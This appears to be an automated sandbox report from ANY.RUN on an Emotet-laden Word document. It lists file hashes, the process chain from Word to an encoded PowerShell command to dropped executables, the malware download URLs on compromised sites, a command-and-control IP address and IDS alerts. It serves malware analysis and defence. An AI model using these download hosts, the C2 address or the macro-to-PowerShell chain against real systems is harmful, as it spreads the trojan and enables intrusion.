Field | Value |
---|---|
File name: | 1237533.zip |
Full analysis: | https://app.any.run/tasks/94c61c39-e71c-4853-b37a-f338ccf68662 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims, but even private users get infected in mass spam email campaigns. |
Analysis date: | April 15, 2019, 07:12:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | — |
Indicators: | — |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | FB03475C75712F61FAB2DBC89F150B76 |
SHA1: | 80DFFC1F188EC351100546D981BB2FCA173D2398 |
SHA256: | B5D9A7A9BAD48ED71306C5027135B7C0D839BDB60DC4B3CF0C3800D35D8D3E62 |
SSDEEP: | 3072:nhFdH3rtLYBOwnBKU6xUlhWuyEZhv14J3W/D8Q:VH3BLYAF+hWuDC3y |
Extension | File type identification |
---|---|
.zip | ZIP compressed archive (100) |

Archive metadata | Value |
---|---|
ZipFileName: | 1237533.doc |
ZipUncompressedSize: | 226688 |
ZipCompressedSize: | 138376 |
ZipCRC: | 0xfe6623d0 |
ZipModifyDate: | 2019:04:04 14:04:00 |
ZipCompression: | Unknown (99) |
ZipBitFlag: | 0x0003 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2904 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\1237533.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0 |
2624 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2904.37595\1237533.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
4080 | powershell -e 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3076 | "C:\Users\admin\805.exe" | C:\Users\admin\805.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
3636 | --ae5f3ebb | C:\Users\admin\805.exe | — | 805.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
3140 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | 805.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
3096 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe | User: admin; Integrity Level: MEDIUM |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR235A.tmp.cvr | — | — | — |
4080 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EK5T46JB6RVBQ8JNUHJ1.temp | — | — | — |
2624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 4CD5F2A8059DEF5196C26926FD1DCC7F | EA37A2808F612FC89E26C6F554DE0FCC92075C4AB3F5391374DDCD4F5DF8838F |
4080 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 5F9A7BF5388376D94C2EDCA422810BEC | 8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C |
4080 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF132c72.TMP | binary | 5F9A7BF5388376D94C2EDCA422810BEC | 8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C |
4080 | powershell.exe | C:\Users\admin\805.exe | executable | 8961D353943918447ED8989A359A4DED | F757D73F8C0011D3FE837A33EF391C6DC3BFBC46E496E50F383F7DE739035ED7 |
2624 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 234575D24E109711C57572B8D2FE1F1A | ADFDFCB3D6A2C2334327BDF21744BA6BEDD792BDA6814FD3C948A9C250B8868F |
2904 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb2904.37595\1237533.doc | document | 953BE355F97B1FA1AA40A1BA88F4459A | 372337F06774C48340DDB041C6A0415235049648109D3D88A57C2F74B7605511 |
2624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb2904.37595\~$237533.doc | pgc | D7F49000FC7AAAC653B7D5B221C95E8C | EDD9E60E8DDB9CA5AAD3A922DD4AAEBC6C68C79F34FDFBC0F0ED71ECC07A0355 |
3636 | 805.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | 8961D353943918447ED8989A359A4DED | F757D73F8C0011D3FE837A33EF391C6DC3BFBC46E496E50F383F7DE739035ED7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4080 | powershell.exe | GET | 200 | 165.227.166.144:80 | http://hadiyaacoub.com/wp-content/uploads/2019/6AP0/ | DE | html | 1.64 Kb | suspicious |
4080 | powershell.exe | GET | 200 | 157.230.127.140:80 | http://grillitrestaurant.com/wp-content/uploads/aSdX/ | US | executable | 174 Kb | malicious |
3096 | soundser.exe | POST | 200 | 89.188.124.145:443 | http://89.188.124.145:443/bml/pnp/ | RU | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4080 | powershell.exe | 157.230.127.140:80 | grillitrestaurant.com | Joao Carlos de Almeida Silveira trading as Bitcanal | US | suspicious |
3096 | soundser.exe | 89.188.124.145:443 | — | Filanco, ltd. | RU | malicious |
4080 | powershell.exe | 165.227.166.144:80 | hadiyaacoub.com | Digital Ocean, Inc. | DE | suspicious |
Domain | IP | Reputation |
---|---|---|
hadiyaacoub.com | — | suspicious |
grillitrestaurant.com | — | malicious |
PID | Process | Class | Message |
---|---|---|---|
4080 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4080 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4080 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
4080 | powershell.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |
3096 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 23 |
3096 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3096 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |